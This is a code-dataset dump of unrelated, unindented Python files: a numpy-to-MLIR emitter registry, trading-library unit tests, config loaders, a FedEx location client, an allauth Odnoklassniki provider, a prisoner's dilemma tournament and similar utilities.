raise appropriate user-visible exceptions (i.e. when invoked with incorrect
arguments).
This hook is used to prepare for emission in a define-by-run scenario.
Static emission from an AST needs to be prepared via another mechanism.
Args:
trace_invocation: An Invocation instance to map.
Returns:
A TraceValueMap describing the structure of the invocation as mapped
to/from IR.
"""
raise NotImplementedError()
def map_results(self, py_results, extra):
"""Maps a list of python results to actual function return values.
Args:
py_results: List of python results corresponding to the emitted op
results.
extra: The extra object returned by map_invocation.
Returns:
Actual function result. Typically this requires special handling to
unpack the result of functions that return 1 item.
"""
raise NotImplementedError()
def emit(self, request: EmissionRequest):
"""Emits IR using the provided ops and types factories.
Args:
emission_inputs: An EmissionRequest produced by tracing each TraceValue
from a previous call to map_invocation and the corresponding extra
value.
Returns:
An iterable of mlir.ir.Value instances representing the outputs of the
operation. The `builder` on `ops` must be positioned to consume these
values.
"""
raise NotImplementedError()
class GenericCallUfuncEmitter(FuncEmitter):
"""A FuncEmitter for generic ufuncs requiring no special behavior.
Representation:
>>> emitter = GenericCallUfuncEmitter("numpy.add")
>>> emitter
<ufunc emitter 'numpy.add'>
>>> inv = TraceInvocation([1, 2], {}, protocol=Protocol.UFUNC)
>>> inputs = emitter.map_invocation(inv)
>>> inputs
TraceValueMap(input_trace_values=[TraceValue(value=1, type=<TraceValueType.NDARRAY: 1>), TraceValue(value=2, type=<TraceValueType.NDARRAY: 1>)], result_trace_value_types=[<TraceValueType.NDARRAY: 1>], extra=None)
Error on unsupported kwargs:
>>> inv = TraceInvocation([1, 2], {"foobar": 1}, protocol=Protocol.UFUNC)
>>> emitter.map_invocation(inv)
Traceback (most recent call last):
...
ValueError: Unexpected keyword args for ufunc numpy.add: foobar
"""
__slots__ = ("_ufunc_name")
def __init__(self, ufunc_name: str):
self._ufunc_name = ufunc_name
def __repr__(self):
return "<ufunc emitter '%s'>" % self._ufunc_name
def map_invocation(self,
trace_invocation: TraceInvocation) -> EmissionRequest:
assert trace_invocation.protocol == Protocol.UFUNC
assert trace_invocation.method == "__call__"
if trace_invocation.kwargs:
raise ValueError(
"Unexpected keyword args for ufunc %s: %s" %
(self._ufunc_name, ", ".join(trace_invocation.kwargs.keys())))
# Without above special cases, any positional args map to emission
# inputs.
return TraceValueMap([
TraceValue(i, TraceValueType.NDARRAY) for i in trace_invocation.inputs
], [TraceValueType.NDARRAY],
extra=None)
def map_results(self, py_results, extra):
# Ufuncs always return one result, so just unpack it.
return py_results[0]
def emit(self, request: EmissionRequest):
h = request.dialect_helper
op_result_type = h.tensor_type(h.numpy_any_dtype)
call_op = h.numpy_builtin_ufunc_call_op(*request.input_ssa_values,
qualified_name=self._ufunc_name,
result_type=op_result_type)
return call_op.results
class GenericArrayFuncEmitter(FuncEmitter):
"""Emitter for array funcs that don't do anything 'special'."""
__slots__ = ("_op_name", "_nresults")
def __init__(self, op_name: str, nresults: int = 1):
self._op_name = op_name
self._nresults = nresults
def __repr__(self):
return "<array_func emitter '%s'>" % self._op_name
def map_invocation(self,
trace_invocation: TraceInvocation) -> EmissionRequest:
assert trace_invocation.protocol == Protocol.ARRAY_FUNC
if trace_invocation.method != "__call__":
raise NotImplementedError("Only __call__ is supported for %s (got '%s')" %
(
self._op_name,
trace_invocation.method,
))
if trace_invocation.kwargs:
raise ValueError(
"Unexpected keyword args for %s: %s" %
(self._op_name, ", ".join(trace_invocation.kwargs.keys())))
# Without above special cases, any positional args map to emission
# inputs.
return TraceValueMap([
TraceValue(i, TraceValueType.NDARRAY) for i in trace_invocation.inputs
], [TraceValueType.NDARRAY] * self._nresults,
extra=None)
def map_results(self, py_results, extra):
if self._nresults == 1:
return py_results[0]
else:
return tuple(py_results)
def emit(self, request: EmissionRequest):
h = request.dialect_helper
op_result_types = [h.tensor_type(h.numpy_any_dtype)] * self._nresults
op = h.op(self._op_name, op_result_types, request.input_ssa_values)
return op.results
class EmitterRegistry:
"""Registry of known Emitter instances mapped to source function.
>>> r = EmitterRegistry.create_default()
>>> r.lookup_ufunc(np.add, "__call__")
<ufunc emitter 'numpy.add'>
>>> r.lookup_array_func(np.dot)
<array_func emitter 'numpy.dot'>
"""
def __init__(self):
self._ufunc_map = {} # Dictionary of (f, method) -> Emitter
self._arrayfunc_map = {} # Dictionary of f -> Emitter
@classmethod
def create_default(cls):
registry = cls()
registry.register_defaults()
return registry
def register_ufunc(self, ufunc, method, emitter):
# Last registration wins.
self._ufunc_map[(ufunc, method)] = emitter
def register_array_func(self, f, emitter):
# Last registration wins.
self._arrayfunc_map[f] = emitter
def lookup_ufunc(self, ufunc, method):
return self._ufunc_map.get((ufunc, method))
def lookup_array_func(self, f):
return self._arrayfunc_map.get(f)
def register_defaults(self):
# Find all ufuncs in the numpy module and register by name.
for member in sorted(dir(np)):
ufunc = getattr(np, member)
if isinstance(ufunc, np.ufunc):
self.register_ufunc(ufunc, "__call__",
GenericCallUfuncEmitter("numpy." + member))
# Register generic 1-result array funcs.
GENERIC_FUNCS = (
(np.inner, "numpy.inner"),
(np.outer, "numpy.outer"),
(np.dot, "numpy.dot"),
(np.vdot, "numpy.vdot"),
(np.linalg.det, "numpy.linalg.det"),
# TODO: This needs a custom implementation to differentiate when
# axes is specified (this version will fail).
(np.transpose, "numpy.transpose"),
)
for f, op_name in GENERIC_FUNCS:
self.register_array_func(f, GenericArrayFuncEmitter(op_name))
if __name__ == "__main__":
import doctest
doctest.testmod()
| StarcoderdataPython |
3392062 | # Builtins
import unittest
import time
# Submodule imports
from harvest.trader import *
from harvest.algo import BaseAlgo
from harvest.api.dummy import DummyStreamer
from harvest.api.paper import PaperBroker
from harvest.api.yahoo import YahooStreamer
# from harvest.api.robinhood import Robinhood
import datetime as dt
import pandas as pd
from harvest.definitions import *
from harvest.utils import gen_data
from _util import *
class TestLiveTrader(unittest.TestCase):
def test_no_streamer_no_broker(self):
"""
If no streamer or broker is specified, LiveTrader should default to Yahoo Streamer and Paper Broker
"""
trader = LiveTrader()
self.assertEqual(trader.streamer_str, "yahoo")
self.assertEqual(trader.broker_str, "paper")
def test_no_streamer_rh_broker(self):
"""
If no streamer is specified but a broker is set, and the broker can be used as a streamer
(which is almost always the case), LiveTrader should use the broker as the streamer
"""
trader = LiveTrader(broker="robinhood")
self.assertEqual(trader.streamer_str, "robinhood")
self.assertEqual(trader.broker_str, "robinhood")
def test_no_streamer_paper_broker(self):
"""
If no streamer is specified but a paper broker is set,
LiveTrader should use the yahoo broker as the streamer
"""
trader = LiveTrader(broker="paper")
self.assertEqual(trader.streamer_str, "yahoo")
self.assertEqual(trader.broker_str, "paper")
def test_yahoo_streamer_no_broker(self):
"""
If a streamer is specified but no broker, LiveTrader should default to use Paper Broker
"""
trader = LiveTrader(streamer="robinhood")
self.assertEqual(trader.streamer_str, "robinhood")
self.assertEqual(trader.broker_str, "paper")
trader_yh = LiveTrader(streamer="yahoo")
self.assertEqual(trader_yh.streamer_str, "yahoo")
self.assertEqual(trader_yh.broker_str, "paper")
def test_broker_sync(self):
"""
Test that the broker is synced with the streamer
"""
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Add positions to the paper broker
def test_trader_adding_symbol(self):
t = PaperTrader(DummyStreamer())
t.set_symbol("A")
self.assertEqual(t.watchlist[0], "A")
@delete_save_files(".")
def test_start_do_nothing(self):
_, _, _ = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
def test_invalid_aggregation(self):
"""If invalid aggregation is set, it should raise an error"""
s = DummyStreamer()
# Prevent streamer from running which will cause an infinite loop
s.start = lambda: None
t = PaperTrader(s)
with self.assertRaises(Exception):
t.start("30MIN", ["5MIN", "1DAY"])
def _create_fake_calendar_df(self, open_today, close_today):
df = pd.DataFrame(
{
"is_open": [True] * 24,
"open_at": [open_today - dt.timedelta(days=24 - i) for i in range(24)],
"close_at": [
close_today - dt.timedelta(days=24 - i) for i in range(24)
],
}
)
return df
def test_day_trade_detection_0(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Manually add transaction history of buying and selling shares on the same day
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 100, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_1(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, and sold again the same day,
it should be counted as 1 day trade.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Manually add transaction history of buying and selling shares on the same day
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 30, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_2(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, and bought again the same day,
it should be counted as 1 day trade.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 50, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_3(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, bought again the same day,
and then sold again the same day, it should be counted as 2 day trades.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 2)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3339300 | # add all the question types to QuestionChoices before anything else
from .. import add_type
from . import simple # store value as returned
from . import choice # multiple choice, do checks
from . import range_or_number # range of numbers
from . import timeperiod # time periods
from . import custom # backwards compatibility support
add_type('custom', 'Custom field') | StarcoderdataPython |
86649 | from environs import Env
import re
import socket
# Loads environmental variables from .env
env = Env()
env.read_env()
# remove ./ from beginning of neo4j variables to avoid issues with docker
neo4j_import_dir = re.sub(
r"^\./", "", env("NEO4J_IMPORT_DIR", "./demo/neo4j/0.0.1/import")
)
neo4j_log_dir = re.sub(r"^\./", "", env("NEO4J_LOG_DIR", "./demo/neo4j/0.0.1/logs"))
neo4j_data_dir = re.sub(r"^\./", "", env("NEO4J_DATA_DIR", "./demo/neo4j/0.0.1/data"))
snakemake_logs = env("SNAKEMAKE_LOGS", "demo/results/logs")
data_dir = env("DATA_DIR", "demo/source_data")
processing_dir = env("PROCESSING_DIR", "demo/scripts/processing")
graph_dir = env("GRAPH_DIR", "demo/results/graph_data")
neo4j_address = env("NEO4J_ADDRESS", socket.getfqdn())
server_name = env("SERVER_NAME", None)
graph_version = env("GRAPH_VERSION", "0.0.1")
container_name = env("GRAPH_CONTAINER_NAME", "neo4j-pipeline-demo-graph")
config_path = env("CONFIG_PATH", "demo/config")
threads = env("THREADS", 4)
graph_bolt = env("GRAPH_BOLT_PORT", "7687")
graph_http = env("GRAPH_HTTP_PORT", "7474")
graph_pass = env("GRAPH_PASSWORD", "<PASSWORD>")
graph_user = env("GRAPH_USER", "neo4j")
graph_host = env("GRAPH_HOST", "localhost")
env_configs = {
"neo4j_import_dir": neo4j_import_dir,
"neo4j_log_dir": neo4j_log_dir,
"neo4j_data_dir": neo4j_data_dir,
"neo4j_address": neo4j_address,
"snakemake_logs": snakemake_logs,
"data_dir": data_dir,
"processing_dir": processing_dir,
"graph_dir": graph_dir,
"server_name": server_name,
"graph_version": graph_version,
"graph_bolt": graph_bolt,
"graph_http": graph_http,
"graph_pass": graph_pass,
"graph_user": graph_user,
"graph_host": graph_host,
"container_name": container_name,
"config_path": config_path,
"threads": threads,
}
| StarcoderdataPython |
1739887 | """Dump Bathak Data"""
import json
from urduhack.utils.io import pickle_dump
new_training_data = []
data = "/Users/ikramali/Projects/Python/Xplore/data/125-172908_bathak_51986_posts-raw.pkl"
data_dump = f"86686_arynews_posts-raw.pkl"
json_data = "/Users/ikram/WorkPlace/projects/posts.json"
# with open(data, 'rb') as f:
# training_data = pickle.load(f)
#
# print("Old training data Count:{}".format(len(training_data)))
#
# for data_tuple in training_data:
# new_training_data.append(data_tuple)
#
# print("New training data Count:{}".format(len(new_training_data)))
#
# new_training_data = sorted(new_training_data, key=lambda x: int(x[0]))
#
# print(new_training_data[-3])
# print(new_training_data[-2])
# print(new_training_data[-1])
json_data = json.load(open(json_data))
json_data_list = []
for item in json_data:
data = (item['url'], item['data'])
json_data_list.append(data)
print("Json training data Count:{}".format(len(json_data_list)))
print(json_data_list[0])
print(json_data_list[1])
print(json_data_list[2])
# last post
print(json_data_list[-3])
print(json_data_list[-2])
print(json_data_list[-1])
for data_tuple in json_data_list:
new_training_data.append(data_tuple)
print("New training data Count:{}".format(len(new_training_data)))
print(new_training_data[0])
print(new_training_data[-2])
print(new_training_data[-1])
pickle_dump(data_dump, new_training_data)
| StarcoderdataPython |
3378151 | <filename>projectname/exampleapp/models/__init__.py
from .example import ExampleModel
| StarcoderdataPython |
3284402 | #x0 y0 x1 y1
paths = \
[dict(steering_angle = 0, target_angle = 0, coords = \
[[-123, 100, 123, 100],
[-123, 335, 123, 335],
[-123, 570, 123, 570],
[-123, 805, 123, 805],
[-123, 1040, 123, 1040],
[-123, 1275, 123, 1275],
[-123, 1510, 123, 1510],
[-123, 1745, 123, 1745],
[-123, 1980, 123, 1980]]),
dict(steering_angle = 11, target_angle = 11, coords = \
[[138.322, 100, -123, 100],
[159.503, 321.132, -99.3681, 351.273],
[190.588, 546.85, -66.7938, 587.805],
[231.097, 771.067, -24.3433, 822.765],
[280.961, 993.392, 27.9092, 1055.74],
[340.091, 1213.43, 89.8718, 1286.32],
[408.383, 1430.81, 161.436, 1514.11],
[485.718, 1645.13, 242.476, 1738.7],
[571.96, 1856.02, 332.85, 1959.7]
]),
dict(steering_angle = 15, target_angle = 18, coords = \
[[156.086, 100, -123, 100],
[190.178, 271.401,-78.3038, 334.508],
[248.678, 479.838, -13.4327, 565.647],
[324.768, 682.516, 70.9446, 790.4],
[417.892, 877.955, 174.211, 1007.13],
[527.369, 1064.72, 295.612, 1214.24],
[652.4, 1241.46, 434.261, 1410.22],
[792.069, 1406.87, 589.143, 1593.65],
[945.357, 1559.75, 759.127, 1763.17]
]),
dict(steering_angle = 20, target_angle = 25, coords = \
[[183.207, 100, -123, 100],
[234.5, 242.056, -37.6253, 357.107],
[313.699, 400.78, 58.1394, 549.03],
[412.168, 548.326, 177.203, 727.438],
[528.352, 682.368, 317.689, 889.516],
[660.42, 800.791, 477.38, 1032.71],
[806.288, 901.727, 653.76, 1154.76],
[963.658, 983.586, 844.045, 1253.74],
[1130.05, 1045.08, 1045.23, 1328.09]
]),
dict(steering_angle = 30, target_angle = 30, coords = \
[[226.055, 100, -123, 100],
[226.055, 100, -54.6, 251.44],
[325.447, 245.977, 81.6842, 451.6],
[431.621, 351.6, 227.268, 596.429],
[554.524, 437.182, 395.789, 713.777],
[690.42, 500.122, 582.127, 800.079],
[835.181, 538.508, 780.621, 852.712],
[984.409, 551.173, 985.238, 870.078],
[1133.57, 537.732, 1189.76, 851.648]
]),
dict(steering_angle = 50, target_angle = 40, coords = \
[[309.664, 100, -123, 100],
[309.664, 100, -14.8391, 261.76],
[355.424, 135.437, 130.504, 399.329],
[425.673, 176.568, 274.031, 487.203],
[516.827, 211.252, 423.619, 544.12],
[612.737, 228.949, 581.013, 573.162],
[710.267, 229.08, 741.064, 573.377],
[806.224, 211.642, 898.536, 544.76],
[897.471, 177.203, 1048.28, 488.245]])]
| StarcoderdataPython |
44580 | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from PySide2.QtWidgets import QVBoxLayout, QWidget
from traitlets import HasTraits, Instance, Bool, directional_link
from regexport.model import AppState
from regexport.views.utils import HasWidget
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT
from matplotlib.figure import Figure
class PlotModel(HasTraits):
selected_data = Instance(np.ndarray, allow_none=True)
data = Instance(np.ndarray, allow_none=True)
show = Bool(default_value=True)
def register(self, model: AppState):
self.model = model
model.observe(self.update, ['cells', 'selected_cells', 'column_to_plot', 'show_plots'])
directional_link((model, 'show_plots'), (self, 'show'))
def update(self, change):
model = self.model
if model.selected_cells is None or model.selected_cells[model.column_to_plot].dtype.name == 'category':
self.selected_data = None
else:
self.data = model.cells[model.column_to_plot].values
self.selected_data = model.selected_cells[model.column_to_plot].values
class PlotView(HasWidget):
# Code from https://www.pythonguis.com/tutorials/plotting-matplotlib/
def __init__(self, model: PlotModel, width=5, height=4, dpi=100):
# Make a figure, turn it into a canvas widget
widget = QWidget()
layout = QVBoxLayout()
widget.setLayout(layout)
HasWidget.__init__(self, widget=widget)
self.fig, self.axes = plt.subplots(ncols=2, figsize=(width, height), dpi=dpi)
self.canvas = FigureCanvasQTAgg(figure=self.fig)
layout.addWidget(self.canvas)
self.toolbar = NavigationToolbar2QT(self.canvas, widget)
layout.addWidget(self.toolbar)
self.model = model
self.model.observe(self.render)
def render(self, change):
if self.model.show:
for ax in self.axes:
ax.cla()
if change.new is None:
return
else:
selected_data = self.model.selected_data
if selected_data is not None:
data = selected_data
_, edges = np.histogram(data[data > 0], bins='auto')
all_edges = np.concatenate([[0, 1], edges])
self.axes[0].hist(
data,
bins=all_edges,
cumulative=False,
# density=True,
)
data = self.model.data
ax: plt.Axes = self.axes[1]
ax.hist(
data,
bins=50,
cumulative=True,
density=True,
)
if selected_data is not None:
ax.vlines(selected_data.max(), 0, 1, colors='black', linestyles='dotted')
# self.axes[1].set_ylim(0, 1)
self.canvas.draw()
| StarcoderdataPython |
3254834 | <filename>third_party/webrtc/src/chromium/src/third_party/webdriver/pylib/test/selenium/common/utils.py<gh_stars>1000+
import os
import socket
import time
import urllib
import subprocess
import signal
SERVER_ADDR = "localhost"
DEFAULT_PORT = 4444
SERVER_PATH = "build/java/server/src/org/openqa/grid/selenium/selenium-standalone.jar"
def start_server(module):
_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
url = "http://%s:%d/wd/hub" % (SERVER_ADDR, DEFAULT_PORT)
try:
_socket.connect((SERVER_ADDR, DEFAULT_PORT))
print ("The remote driver server is already running or something else"
"is using port %d, continuing..." % DEFAULT_PORT)
except:
print ("Starting the remote driver server")
module.server_proc = subprocess.Popen(
"java -jar %s" % SERVER_PATH,
shell=True)
assert wait_for_server(url, 10), "can't connect"
print "Server should be online"
def wait_for_server(url, timeout):
start = time.time()
while time.time() - start < timeout:
try:
urllib.urlopen(url)
return 1
except IOError:
time.sleep(0.2)
return 0
def stop_server(module):
# FIXME: This does not seem to work, the server process lingers
try:
os.kill(module.server_proc.pid, signal.SIGTERM)
time.sleep(5)
except:
pass
| StarcoderdataPython |
3294310 | <reponame>Linekio/python-fedex
"""
Location Service Module
This package contains the shipping methods defined by Fedex's
LocationService WSDL file. Each is encapsulated in a class for
easy access. For more details on each, refer to the respective class's
documentation.
"""
from ..base_service import FedexBaseService
class FedexSearchLocationRequest(FedexBaseService):
"""
This class allows you to figure out a FedEx location closest
to a specified location criteria, based on location type.
The response includes location details like operating times,
directions and a map link and more.
"""
def __init__(self, config_obj, *args, **kwargs):
"""
@type config_obj: L{FedexConfig}
@param config_obj: A valid FedexConfig object.
"""
self._config_obj = config_obj
# Holds version info for the VersionId SOAP object.
self._version_info = {
'service_id': 'locs',
'major': '9',
'intermediate': '0',
'minor': '0'
}
# Set default objects.
self.Address = None
"""@ivar: Holds the Address WSDL object."""
self.PhoneNumber = None
"""@ivar: Holds the PhoneNumber string object."""
self.MultipleMatchesAction = None
"""@ivar: Holds the MultipleMatchesActionType WSDL object."""
self.Constraints = []
"""@ivar: Holds a list of SearchLocationConstraints WSDL objects."""
self.LocationsSearchCriterion = None
"""@ivar: Holds the LocationsSearchCriteriaType WSDL object."""
self.SortDetail = None
"""@ivar: Holds the LocationSortDetail WSDL object."""
self.GeographicCoordinates = None
"""@ivar: Holds the GeographicCoordinates WSDL object."""
super(FedexSearchLocationRequest, self).__init__(
self._config_obj, 'LocationsService_v9.wsdl', *args, **kwargs)
def _prepare_wsdl_objects(self):
"""
Create the data structure and get it ready for the WSDL request.
"""
# Service defaults for objects that are required.
self.MultipleMatchesAction = 'RETURN_ALL'
self.Constraints = self.create_wsdl_object_of_type('SearchLocationConstraints')
self.Address = self.create_wsdl_object_of_type('Address')
self.LocationsSearchCriterion = 'ADDRESS'
self.GeographicCoordinates = None
self.SortDetail = self.create_wsdl_object_of_type('LocationSortDetail')
def _assemble_and_send_request(self):
"""
Fires off the Fedex request.
@warning: NEVER CALL THIS METHOD DIRECTLY. CALL send_request(),
WHICH RESIDES ON FedexBaseService AND IS INHERITED.
"""
# We get an exception like this when specifying an IntegratorId:
# suds.TypeNotFound: Type not found: 'IntegratorId'
# Setting it to None does not seem to appease it.
del self.ClientDetail.IntegratorId
self.logger.debug(self.WebAuthenticationDetail)
self.logger.debug(self.ClientDetail)
self.logger.debug(self.TransactionDetail)
self.logger.debug(self.VersionId)
# Fire off the query.
return self.client.service.searchLocations(
WebAuthenticationDetail=self.WebAuthenticationDetail,
ClientDetail=self.ClientDetail,
TransactionDetail=self.TransactionDetail,
Version=self.VersionId,
LocationsSearchCriterion=self.LocationsSearchCriterion,
PhoneNumber=self.PhoneNumber,
MultipleMatchesAction=self.MultipleMatchesAction,
Constraints=self.Constraints,
Address=self.Address,
SortDetail=self.SortDetail,
GeographicCoordinates=self.GeographicCoordinates)
| StarcoderdataPython |
3351050 | from eval.eval import MedlineEvaluator
from util.arguments import settings
if __name__ == '__main__':
medline_path_new = settings['medline_path']
medline_path_old = settings['medline_path_old']
unannotated_path = '/home/midas/data/eval/old-unannotated-major.json'
eval_candidate_path = '/home/midas/data/eval/new-annotated-major.json'
only_major = True
print 'old: ' + medline_path_old
print 'new: ' + medline_path_new
evaluator = MedlineEvaluator(medline_path_old, medline_path_new, unannotated_path, eval_candidate_path)
evaluator.extractCandidates(only_major)
print 'done!'
| StarcoderdataPython |
78003 | # pylint: disable=R0902,E1101,W0201,too-few-public-methods,W0613
import datetime
from sqlalchemy_utils import UUIDType
from sqlalchemy import (
Column,
DateTime,
Integer,
Sequence,
)
from codebase.utils.sqlalchemy import ORMBase
class User(ORMBase):
"""
Users are created and authenticated by the AuthN service; they are stored here only for convenient relationship mapping.
1. The uuid used as the user ID should not appear in other association tables; use the Integer primary key instead.
2. SQLAlchemy can then provide convenient queries.
"""
__tablename__ = "authz_user"
id = Column(Integer, Sequence("authz_user_id_seq"), primary_key=True)
# TODO: Although we assume the user id is a uuid here, that is not necessarily the case.
# Consider creating the uid field dynamically based on user configuration instead of forcing uuid.
uuid = Column(UUIDType(), unique=True)
created = Column(DateTime(), default=datetime.datetime.utcnow)
| StarcoderdataPython |
3470 | import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
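# Worked example of the payoff matrix above (illustration only): if you defect
# (move 0) while your opponent cooperates (move 1), you score pointsArray[0][1] = 5
# and they score pointsArray[1][0] = 0; mutual cooperation gives each player
# pointsArray[1][1] = 3, and mutual defection gives each pointsArray[0][0] = 1.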
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn.
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| StarcoderdataPython |
1662890 | <filename>genericDetector/__init__.py
from .genericDetector import GenericDetector | StarcoderdataPython |
1676759 | from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2_provider.provider import OAuth2Provider
class OdnoklassnikiAccount(ProviderAccount):
def get_profile_url(self):
return "https://ok.ru/profile/" + self.account.extra_data["uid"]
def get_avatar_url(self):
ret = None
pic_big_url = self.account.extra_data.get("pic1024x768")
pic_medium_url = self.account.extra_data.get("pic640x480")
pic_small_url = self.account.extra_data.get("pic190x190")
if pic_big_url:
return pic_big_url
elif pic_medium_url:
return pic_medium_url
elif pic_small_url:
return pic_small_url
else:
return ret
def to_str(self):
dflt = super(OdnoklassnikiAccount, self).to_str()
return self.account.extra_data.get("name", dflt)
class OdnoklassnikiProvider(OAuth2Provider):
id = "odnoklassniki"
name = "Odnoklassniki"
account_class = OdnoklassnikiAccount
def extract_uid(self, data):
return data["uid"]
def extract_common_fields(self, data):
return dict(last_name=data.get("last_name"), first_name=data.get("first_name"))
provider_classes = [OdnoklassnikiProvider]
| StarcoderdataPython |
46986 | #!/usr/bin/env python
"""Create benchmark for k nearest neighbor on unit sphere in R^k."""
# Scroll down to line 90 to "Adjust this" to add your experiment
import random
import numpy as np
import os.path
import logging
import sys
import Queue as queue
import h5py
import time
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_point(n):
"""Create a random point on the unit sphere in R^n."""
p = np.array([random.uniform(-1, 1) for _ in range(n)])
return p / np.linalg.norm(p)
def create_points(n, number):
"""Create number random points on the unit sphere in R^n."""
return [create_point(n) for _ in range(number)]
